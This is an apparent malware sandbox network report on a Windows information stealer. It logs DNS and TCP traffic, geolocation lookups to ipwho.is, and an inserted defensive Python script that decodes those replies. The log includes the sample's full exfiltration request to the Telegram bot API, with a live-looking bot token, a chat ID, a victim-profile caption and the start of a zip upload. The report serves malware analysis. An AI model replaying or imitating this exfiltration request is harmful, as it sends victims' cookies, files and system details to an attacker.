                            Jul 29, 2024 07:38:56.780936956 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.780950069 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.781320095 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.821330070 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886003971 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886082888 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886197090 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886235952 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886321068 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886364937 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886389971 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886405945 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886470079 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886487961 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886589050 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886604071 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886648893 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886671066 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886701107 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886737108 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886821032 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886840105 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886862040 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886876106 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886895895 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886909962 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.886921883 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886936903 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.886985064 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887006998 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887027025 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887052059 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.887073994 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887123108 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887154102 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887171984 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887191057 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887208939 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887234926 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887254953 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887285948 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.887365103 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887377024 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.887396097 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887418985 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.887439013 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887512922 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887535095 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887553930 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.887624979 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.887655973 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.887847900 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.899955034 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.899974108 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900058985 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900080919 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900120974 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900146961 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900173903 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900219917 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900234938 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900373936 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.900393009 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.900490999 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.904902935 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.904921055 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.904994011 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905023098 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905087948 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905111074 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905141115 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905184031 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905208111 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905577898 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905627012 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905653954 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905689955 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905731916 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905750990 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.905925035 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905965090 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.905998945 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906028032 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906042099 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906078100 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906092882 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906173944 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906213999 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906229019 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.906255960 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.906299114 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.910327911 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910381079 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910475016 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.910487890 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910569906 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:56.910597086 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.910655975 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:56.915122032 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:58.166621923 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:58.166810036 CEST44360284149.154.167.220192.168.2.8
                            Jul 29, 2024 07:38:58.167052984 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:58.168867111 CEST60284443192.168.2.8149.154.167.220
                            Jul 29, 2024 07:38:58.168894053 CEST44360284149.154.167.220192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 29, 2024 07:38:00.853925943 CEST | 56033 | 53 | 192.168.2.8 | 1.1.1.1
Jul 29, 2024 07:38:00.860754967 CEST | 53 | 56033 | 1.1.1.1 | 192.168.2.8
Jul 29, 2024 07:38:36.526825905 CEST | 56366 | 53 | 192.168.2.8 | 1.1.1.1
Jul 29, 2024 07:38:36.650335073 CEST | 53 | 56366 | 1.1.1.1 | 192.168.2.8
Jul 29, 2024 07:38:43.032110929 CEST | 53 | 55821 | 162.159.36.2 | 192.168.2.8
Jul 29, 2024 07:38:43.934698105 CEST | 53 | 61109 | 1.1.1.1 | 192.168.2.8
Jul 29, 2024 07:38:56.102005959 CEST | 63651 | 53 | 192.168.2.8 | 1.1.1.1
Jul 29, 2024 07:38:56.108771086 CEST | 53 | 63651 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 29, 2024 07:38:00.853925943 CEST | 192.168.2.8 | 1.1.1.1 | 0x726b | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Jul 29, 2024 07:38:36.526825905 CEST | 192.168.2.8 | 1.1.1.1 | 0x2e89 | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Jul 29, 2024 07:38:56.102005959 CEST | 192.168.2.8 | 1.1.1.1 | 0x188a | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 29, 2024 07:38:00.860754967 CEST | 1.1.1.1 | 192.168.2.8 | 0x726b | No error (0) | ipwho.is | (none) | 195.201.57.90 | A (IP address) | IN (0x0001) | false
Jul 29, 2024 07:38:36.650335073 CEST | 1.1.1.1 | 192.168.2.8 | 0x2e89 | No error (0) | ipwho.is | (none) | 195.201.57.90 | A (IP address) | IN (0x0001) | false
Jul 29, 2024 07:38:56.108771086 CEST | 1.1.1.1 | 192.168.2.8 | 0x188a | No error (0) | api.telegram.org | (none) | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                            • api.telegram.org
                            • ipwho.is
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 195.201.57.90 | 80 | 7552 | C:\Users\user\Desktop\765iYbgWn9.exe
Timestamp | Bytes transferred | Direction | Data
Jul 29, 2024 07:38:00.870285988 CEST | 59 | OUT | GET /?output=json HTTP/1.1
                            accept: */*
                            host: ipwho.is
Jul 29, 2024 07:38:01.523041964 CEST | 950 | IN | HTTP/1.1 200 OK
                            Date: Mon, 29 Jul 2024 05:38:01 GMT
                            Content-Type: application/json; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Server: ipwhois
                            Access-Control-Allow-Headers: *
                            X-Robots-Tag: noindex
                            Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                            Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:38:01-04:00"}}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49708 | 195.201.57.90 | 80 | 7552 | C:\Users\user\Desktop\765iYbgWn9.exe
Timestamp | Bytes transferred | Direction | Data
Jul 29, 2024 07:38:36.658557892 CEST | 59 | OUT | GET /?output=json HTTP/1.1
                            accept: */*
                            host: ipwho.is
Jul 29, 2024 07:38:37.310988903 CEST | 950 | IN | HTTP/1.1 200 OK
                            Date: Mon, 29 Jul 2024 05:38:37 GMT
                            Content-Type: application/json; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Server: ipwhois
                            Access-Control-Allow-Headers: *
                            X-Robots-Tag: noindex
                            Data Raw: 32 63 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 [TRUNCATED]
                            Data Ascii: 2c6{"ip":"8.46.123.33","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"Centurylink Communications, LLC","isp":"Level","domain":"lumen.com"},"timezone":{"id":"America\/New_York","abbr":"EDT","is_dst":true,"offset":-14400,"utc":"-04:00","current_time":"2024-07-29T01:38:37-04:00"}}0
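Both ipwho.is replies above are sent with Transfer-Encoding: chunked, which is why the Data Ascii view starts with `2c6` (the hex chunk size) and ends with `0` (the last-chunk marker) around the JSON. An analyst who wants to work from the Data Raw hex therefore has to dechunk before parsing. The following is an added example and is not part of the Joe Sandbox report or of the sample's own code: it reassembles a chunked body and rebuilds the "- IP Info -" lines that reappear verbatim in the later Telegram caption. The JSON is constructed from a subset of the captured fields and split across two chunks so the decoder has to join them; the mapping from JSON keys to caption fields (ISP as `<isp> - A<asn>`, Timezone from `timezone.utc`) is inferred from the matching values in this report, not documented behaviour of the malware.

```python
"""Dechunk an ipwho.is reply and derive the fields the stealer reports."""
import json

# Constructed sample: a subset of the captured ipwho.is JSON, split into two
# chunks so that dechunk() has to reassemble it (real replies use one chunk).
PAYLOAD = json.dumps({
    "ip": "8.46.123.33", "success": True, "country": "United States",
    "city": "New York", "postal": "10000",
    "connection": {"asn": 3356, "org": "Centurylink Communications, LLC",
                   "isp": "Level", "domain": "lumen.com"},
    "timezone": {"id": "America/New_York", "utc": "-04:00"},
}).encode()
SPLIT = 100
SAMPLE_CHUNKED_BODY = (
    f"{SPLIT:x}\r\n".encode() + PAYLOAD[:SPLIT] + b"\r\n"
    + f"{len(PAYLOAD) - SPLIT:x}\r\n".encode() + PAYLOAD[SPLIT:] + b"\r\n"
    + b"0\r\n\r\n"
)


def dechunk(body):
    """Reassemble an HTTP/1.1 chunked transfer body (RFC 9112 section 7.1).

    Each chunk is '<hex size>[;extensions]CRLF<data>CRLF'; a zero size ends
    the body. Trailer fields after the last chunk are ignored."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size_line = body[pos:end].split(b";", 1)[0]  # drop chunk extensions
        size = int(size_line, 16)
        pos = end + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data
    return bytes(out)


def ip_info_block(geo):
    """Rebuild the '- IP Info -' caption lines from the geolocation JSON.

    Assumed mapping, inferred from the values in this report: the ISP field
    is '<isp> - A<asn>' and Timezone is the 'utc' offset string."""
    conn = geo.get("connection", {})
    return {
        "IP": geo["ip"],
        "Country": geo["country"],
        "City": geo["city"],
        "Postal": geo["postal"],
        "ISP": f"{conn.get('isp', '?')} - A{conn.get('asn', '?')}",
        "Timezone": geo.get("timezone", {}).get("utc", "?"),
    }


def analyse_geo_reply(chunked_body):
    """Decode a chunked ipwho.is body and return the derived IP Info fields."""
    geo = json.loads(dechunk(chunked_body).decode("utf-8"))
    return ip_info_block(geo)


if __name__ == "__main__":
    for key, value in analyse_geo_reply(SAMPLE_CHUNKED_BODY).items():
        print(f"{key}: {value}")
```

To run this against the report itself, paste the full Data Raw hex of one reply into `bytes.fromhex()` and pass the result to `analyse_geo_reply`; the output should match the IP, Country, City, Postal, ISP and Timezone lines of the Telegram caption.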


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 60284 | 149.154.167.220 | 443 | 7552 | C:\Users\user\Desktop\765iYbgWn9.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 05:38:56 UTC | 1232 | OUT | POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20Y7SLS%20(1280,%201024)%0AHWID:%205205123305035030%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookie [TRUNCATED]
                            content-type: multipart/form-data; boundary=35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92dd
                            content-length: 938035
                            accept: */*
                            host: api.telegram.org
                            2024-07-29 05:38:56 UTC15152OUTData Raw: 2d 2d 33 35 61 65 32 31 31 64 33 34 39 63 62 31 66 34 2d 61 37 37 33 38 35 66 39 32 33 63 33 63 36 32 36 2d 30 65 34 36 63 37 30 30 35 39 64 32 61 31 37 63 2d 64 37 64 35 34 65 62 64 38 62 36 62 39 32 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 38 2e 34 36 2e 31 32 33 2e 33 33 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 64 37 fd 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 64 37 fd 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00
                            Data Ascii: --35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92ddContent-Disposition: form-data; name="document"; filename="[US]_8.46.123.33.zip"Content-Type: application/zipPKd7XAutofill/PKd7X
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 48 42 12 00 b6 b1 4d 6b 23 51 20 54 51 18 a7 30 8d 70 00 89 2d 24 03 81 dd b0 85 dd b0 85 dd 90 84 24 24 01 20 09 db dc 2f 10 00 92 b8 9f 6d 6c 03 50 6b 4f 66 12 11 48 62 1c 47 32 93 88 40 12 11 01 40 66 02 20 09 49 d8 66 9a 26 aa 02 00 db 64 26 b6 01 88 08 22 82 cc 24 22 90 c4 fd 24 d1 5a a3 b5 06 80 24 22 2a 11 20 15 32 27 32 c1 6e 74 a5 a7 b5 11 08 22 40 2a b4 36 22 15 4a 11 d3 34 01 20 09 00 db dc 4f 12 b6 91 84 6d 5a 6b 00 94 52 90 84 6d 5a 6b 94 52 18 c7 11 49 2c 16 0b 6c 33 8e 23 11 81 24 6c 93 99 d8 26 22 88 08 32 93 69 9a a8 11 48 02 40 12 00 b6 01 b0 8d 6d 22 82 5a 2b e3 38 02 d0 75 1d d3 34 91 99 84 2a 92 88 08 00 5a 6b b4 d6 00 28 a5 50 6b 65 9a 26 6c 23 09 db b4 d6 00 28 a5 20 89 fb 49 02 20 33 01 90 44 ad 95 cc 24 33 c9 4c ee 27 09 00 db 44
                            Data Ascii: HBMk#Q TQ0p-$$$ /mlPkOfHbG2@@f If&d&"$"$Z$"* 2'2nt"@*6"J4 OmZkRmZkRI,l3#$l&"2iH@m"Z+8u4*Zk(Pke&l#( I 3D$3L'D
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 5e 24 e2 85 b3 cd 0b 62 1b 49 00 d8 e6 81 6c 03 50 10 2f 8c cc 73 b0 cd 0b 63 9b e7 47 12 0f 64 1b 00 99 e7 61 1b 00 db d8 26 22 00 b0 8d 6d 24 01 60 9b 07 92 c4 73 93 cd 03 d9 e6 81 4a 29 d8 c6 36 00 b6 91 c4 fd 02 71 3f db 3c 37 49 d8 c6 36 b6 91 04 80 6d 00 94 46 12 92 90 04 80 6d 6c 63 1b 49 00 48 c2 36 00 b6 91 04 80 33 91 04 80 24 1e c8 36 32 97 d9 c6 36 92 88 08 6c d3 5a 43 12 f7 93 c4 0b 62 1b 00 49 dc cf 36 b6 89 08 00 a6 69 02 a0 d6 0a 40 66 52 10 92 00 c8 4c 6c 23 09 00 db 94 52 18 c7 91 88 a0 94 c2 34 4d 00 94 52 b0 8d 24 6c 63 1b 00 49 00 d8 06 a0 22 6c 63 1b 80 88 40 12 b6 b1 4d 66 62 1b 00 49 3c 50 44 00 60 9b cc 04 40 12 92 b8 9f 6d 24 21 09 49 d8 c6 36 b6 b1 4d 66 22 09 49 48 e2 b9 c9 01 80 24 6c 63 1b 00 49 48 c2 2d 91 84 24 6c 93 99 d8
                            Data Ascii: ^$bIlP/scGda&"m$`sJ)6q?<7I6mFmlcIH63$626lZCbI6i@fRLl#R4MR$lcI"lc@MfbI<PD`@m$!I6Mf"IH$lcIH-$l
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 24 91 99 d8 46 12 11 81 e2 fb d7 b6 cd f3 23 89 e4 85 93 c4 fd 6c 73 bf 2f 3d fe d7 bc d2 ce c0 62 63 93 88 e0 5f 6b 18 47 2e 5c bc c4 fe e1 21 2f cc 40 e1 12 0b 0e dd f1 6d ab 47 f1 f4 b6 c5 03 d9 e6 85 11 2f 1a db 00 48 e2 7e b6 f9 97 48 e2 85 f9 8a 47 fd 39 1f 7d f3 df 22 05 d8 e0 04 12 9c 80 71 ec b0 3c f1 6e 3c b7 69 9a a8 b5 f2 40 e5 b3 3e 09 7f de 97 01 f0 b4 a7 df ca f1 e3 c7 59 2c 16 cc 66 33 4a bb 0f d7 6b b8 df 1f dc be cf 1b fe fe 82 14 2f 9c cd 0b 13 98 17 c6 36 ff 11 3e f9 49 9f cf e7 7c de 17 f2 df e9 b3 3e e3 53 f9 e2 87 7f 06 ff 99 6c f3 40 c1 73 b2 0d 80 24 24 d1 6c 9e db a7 3c f5 f3 f9 9c cf fb 42 fe 3b 7d d6 67 7c 2a 5f fc d0 4f e3 5f 22 f3 1c 6c f3 9f c5 36 cf 4d e6 3f 94 6d fe 35 c2 bc c8 6c f3 40 b6 91 c4 bf 87 78 e1 6c f3 42 39 78
                            Data Ascii: $F#ls/=bc_kG.\!/@mG/H~HG9}"q<n<i@>Y,f3Jk/6>I|>Sl@s$$l<B;}g|*_O_"l6M?m5l@xlB9x
